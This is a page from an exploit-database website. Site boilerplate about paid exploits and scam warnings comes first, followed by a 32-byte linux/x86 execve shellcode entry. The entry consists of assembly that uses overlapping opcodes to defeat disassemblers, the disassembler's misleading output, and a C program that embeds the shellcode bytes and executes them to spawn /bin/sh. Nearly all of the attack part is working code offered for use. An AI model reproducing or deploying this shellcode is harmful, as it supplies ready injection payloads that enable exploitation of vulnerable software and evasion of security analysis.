0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes
============================================================ linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes ============================================================ /* execve() shellcode with 'fuck up disasm' ability, 32 bytes long by BaCkSpAcE [sinisa86(at)gmail(dot)com] BitByterz Labs 2006 http://www.bitbyterz.org ; ; shellcode.asm ; fupdisasm: db 0x68 ; opcode for PUSH DW instruction db 0xcd ; crypt+1, opcode for INT instruction db 0x80 ; interrupt number (80 in this case) db 0x68 ; crypt+3 db 0x68 jmp fupdisasm+3 db 0x68 ; MAGIC_BYTE: this byte makes disasm go crazy ; our shellcode which we want to hide push byte 11 pop eax xor edx, edx push edx push 0x68732f2f push 0x6e69622f mov ebx, esp push edx push ebx mov ecx, esp jmp fupdisasm+1 ; jumps on address where is hidden int 0x80 backspace@bitbyterz# nasm shellcode.asm backspace@bitbyterz# ndisasm -u shellcode 00000000 68CD806868 push dword 0x686880cd 00000005 EBFC jmp short 0x3 00000007 686A0B5831 push dword 0x31580b6a 0000000C D25268 rcl byte [edx+0x68],cl 0000000F 2F das 00000010 2F das 00000011 7368 jnc 0x7b 00000013 682F62696E push dword 0x6e69622f 00000018 89E3 mov ebx,esp 0000001A 52 push edx 0000001B 53 push ebx 0000001C 89E1 mov ecx,esp 0000001E EBE1 jmp short 0x1 Find difference between original and dissasembled shellcode ;) */ #include <stdio.h> #include <string.h> char shellcode[] = "\x68\xcd\x80\x68\x68\xeb\xfc\x68" "\x6a\x0b\x58\x31\xd2\x52\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x52\x53\x89\xe1\xeb\xe1"; main() { void (*fp) (void); fp = (void *) shellcode; printf ("%d bytes\n", strlen(shellcode)); fp(); } # 0day.today [2024-12-26] #